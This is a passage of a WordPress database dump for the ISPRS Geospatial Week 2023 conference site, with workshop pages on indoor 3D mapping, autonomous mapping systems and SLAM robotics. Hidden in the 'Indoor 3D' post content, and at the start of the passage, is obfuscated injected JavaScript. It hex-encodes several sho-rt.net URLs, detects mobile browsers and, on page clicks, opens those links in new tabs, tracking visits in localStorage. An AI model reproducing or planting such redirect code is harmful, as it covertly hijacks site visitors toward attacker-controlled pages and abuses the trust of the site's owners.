)|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','IAMS - Intelligent and autonomous mapping systems','','publish','closed','closed','','iams-intelligent-and-autonomous-mapping-systems','','','2023-02-07 02:03:40','2023-02-07 02:03:40','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2580',0,'dt_portfolio','',0),
(2581,1,'2022-10-07 20:13:47','2022-10-07 20:13:47','','mws7','','inherit','open','closed','','mws7','','','2022-10-07 20:13:47','2022-10-07 20:13:47','',2580,'https://gsw2023.com/wp-content/uploads/2022/10/mws7.jpg',0,'attachment','image/jpeg',0),
(2582,1,'2022-10-07 20:13:56','2022-10-07 20:13:56','','IAMS - Intelligent and autonomous mapping systems','','inherit','closed','closed','','2580-revision-v1','','','2022-10-07 20:13:56','2022-10-07 20:13:56','',2580,'https://gsw2023.com/?p=2582',0,'revision','',0),
(2583,1,'2022-10-07 20:15:48','2022-10-07 20:15:48','','mws4','','inherit','open','closed','','mws4','','','2022-10-07 20:15:48','2022-10-07 20:15:48','',2570,'https://gsw2023.com/wp-content/uploads/2022/10/mws4.jpg',0,'attachment','image/jpeg',0),
(2585,1,'2022-10-07 20:19:26','2022-10-07 20:19:26','','mws2','','inherit','open','closed','','mws2','','','2022-10-07 20:19:26','2022-10-07 20:19:26','',2572,'https://gsw2023.com/wp-content/uploads/2022/10/mws2.jpg',0,'attachment','image/jpeg',0),
(2586,1,'2022-10-07 20:24:41','2022-10-07 20:24:41','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2587\" img_size=\"600x600\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Indoor 3D</span></strong></h5>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<h5></h5>\n<p>&nbsp;</p>\n<h5></h5>\n<h5 style=\"text-align: justify; color: black;\"><strong>The workshop <em>Indoor 3D 2023</em> is the latest in the series of workshops dedicated to research and developments in the area of indoor spatial information. It aims to bring together researchers, professionals and users from the academia and industry involved in indoor mapping, 3D modeling, navigation, location-based services (LBS) and mobility. Papers addressing the following topics are welcomed (but not limited to): seamless Indoor/outdoor/underground 3D modelling, autonomous navigation in indoor/outdoor environments, Location-based services in indoor environments, indoor pedestrian tracking and trajectory prediction, disaster management in indoor/underground environments, indoor/outdoor scene understanding, machine/deep learning for indoor modelling, indoor virtual/augmented reality, indoor mobility and assistive technologies, etc. This workshop will be part of the ISPRS Geospatial Week 2023 and will be organized by the ISPRS Working Group IV/4, in cooperation with ISPRS WG IV/7.</strong></h5>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">CHAIR</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"42\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CO-CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"43\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row][vc_row][vc_column width=\"3/4\"][vc_column_text]</p>\n<h1 style=\"text-align: left;\">SECRETARY</h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=\"2/3\"][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"44\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][vc_column width=\"1/3\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: purple;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Seamless indoor/underground/outdoor 3D modelling and mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Stationary and dynamic obstacle detection</strong></h6>\n</li>\n<li>\n<h6><strong>Multisensory fusion for indoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Eye-tracking and body sensors in indoor 3D research</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor localization and route planning for disaster management</strong></h6>\n</li>\n<li>\n<h6><strong>Navigation, orientation and accessibility augmentation in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>LBS in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Innovative LBS systems and applications</strong></h6>\n</li>\n<li>\n<h6><strong>Aided mobility for disabled/aged people</strong></h6>\n</li>\n<li>\n<h6><strong>Disaster prevention, analysis and management in indoor/underground environments</strong></h6>\n</li>\n<li>\n<h6><strong>Smart facility maintenance</strong></h6>\n</li>\n<li>\n<h6><strong>Spatio-temporal data modelling, analysis of movement traces</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor location-linked big data</strong></h6>\n</li>\n<li>\n<h6><strong>SLAM methods in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic parsing in indoor environments</strong></h6>\n</li>\n<li>\n<h6><strong>Visualization techniques for LBS in indoor/outdoor seamless environments</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor virtual/augmented reality</strong></h6>\n</li>\n<li>\n<h6><strong>Human environment interactions in mobility context</strong></h6>\n</li>\n<li>\n<h6><strong>Multi-task collaboration for Indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Indoor/outdoor scene understanding</strong></h6>\n</li>\n<li>\n<h6><strong>Machine/deep learning for indoor/outdoor modelling</strong></h6>\n</li>\n<li>\n<h6><strong>Mobility and assistive technologies</strong></h6>\n</li>\n<li>\n<h6><strong>Semantic indoor/underground/outdoor mapping</strong></h6>\n</li>\n<li>\n<h6><strong>Multimodal mobility for people with specific needs</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][vc_column width=\"1/2\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align: justify; color: purple;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Dev Raj Paudyal, University of Southern Queensland</strong></h6>\n</li>\n<li>\n<h6><strong>Berk Anbaroğlu, Geomatics Engineering Dept. of Hacettepe University</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, Technischen Universität Wien</strong></h6>\n</li>\n<li>\n<h6><strong>Kourosh Khoshelham, University of Melbourne</strong></h6>\n</li>\n<li>\n<h6><strong>Victor N. Sunday, University of Port Harcourt,</strong></h6>\n</li>\n<li>\n<h6><strong>Chenglu Wen, Xiamen University</strong></h6>\n</li>\n<li>\n<h6><strong>Yiping Chen, Sun Yat-sen University</strong></h6>\n</li>\n<li>\n<h6><strong>Ville Lehtola,  University of Twente</strong></h6>\n</li>\n<li>\n<h6><strong>Ruofei Zhong, Capital Normal University</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University</strong></h6>\n</li>\n<li>\n<h6><strong>Abdoulaye Diakité, The University of New South Wales</strong></h6>\n</li>\n<li>\n<h6><strong>David  Sánchez Rodríguez, University of Las Palmas de Gran Canaria</strong></h6>\n</li>\n<li>\n<h6><strong>Pawel Boguslawski, University of the West of England (UK),</strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Mimar Sinan Fine Arts University (Turkey)</strong></h6>\n</li>\n<li>\n<h6><strong>Mohsen Kalantari, Melbourne School of Engineering</strong></h6>\n</li>\n<li>\n<h6><strong>Juntao Yang, Shandong University of Science and Technology</strong></h6>\n</li>\n<li>\n<h6><strong>Hao Cheng, Leibniz Universität Hannover</strong></h6>\n</li>\n<li>\n<h6><strong>Lei Niu, Lanzhou Jiaotong University</strong></h6>\n</li>\n<li>\n<h6>Jesús Balado Frías, University of Vigo<u></u></h6>\n</li>\n<li>\n<h6>Bruno Vallet, LASTIG, IGN-ENSG<u></u></h6>\n</li>\n<li>\n<h6>Laurent Caraffa, The LASTIG lab<u></u></h6>\n</li>\n<li>\n<h6>Florent Geniet, The LASTIG lab<u></u></h6>\n</li>\n<li>\n<h6>Grégoire Grzeczkowicz, The LASTIG lab</h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: blue;\"><u>Selected papers:</u><u></u><u></u></h5>\n<h5>After the event, the authors of selected papers will be invited to submit the extended versions of their papers to the PFG – Journal of Photogrammetry, Remote Sensing and Geoinformation Science (<a style=\"color: blue;\" href=\"https://www.springer.com/journal/41064\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=https://www.springer.com/journal/41064&amp;source=gmail&amp;ust=1669914909168000&amp;usg=AOvVaw2hdBtPRabM3CR7bs4nXqo6\">https://www.springer.com/<wbr />journal/41064</a><a href=\"https://www.springer.com/journal/41064\" target=\"_blank\" rel=\"noopener\" data-saferedirecturl=\"https://www.google.com/url?q=https://www.springer.com/journal/41064&amp;source=gmail&amp;ust=1669914909168000&amp;usg=AOvVaw2hdBtPRabM3CR7bs4nXqo6\">)</a>; current impact factor: 3.292).</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"9\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Indoor 3D','','publish','closed','closed','','indoor-3d','','','2023-02-05 14:55:40','2023-02-05 14:55:40','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2586',0,'dt_portfolio','',0),
(2587,1,'2022-10-07 20:24:25','2022-10-07 20:24:25','','mws8','','inherit','open','closed','','mws8','','','2022-10-07 20:24:25','2022-10-07 20:24:25','',2586,'https://gsw2023.com/wp-content/uploads/2022/10/mws8.jpg',0,'attachment','image/jpeg',0),
(2588,1,'2022-10-07 20:24:41','2022-10-07 20:24:41','','Indoor 3D','','inherit','closed','closed','','2586-revision-v1','','','2022-10-07 20:24:41','2022-10-07 20:24:41','',2586,'https://gsw2023.com/?p=2588',0,'revision','',0),
(2589,1,'2023-02-05 11:08:30','2023-02-05 11:08:30','[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2585\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Robotics for Mapping - SLAM approaches for mobile mapping and robot intelligence</span></strong></h5>\n&nbsp;\n\n&nbsp;\n<h5 style=\"text-align: justify; color: black;\">The availability of accurate geospatial information and reliable ubiquitous localization systems are key factors in a number of applications and contexts, ranging from location-based services and smart cities, to the use of terrestrial, underground, aerial and underwater autonomous robots, autonomous driving, and positioning in GNSS-denied 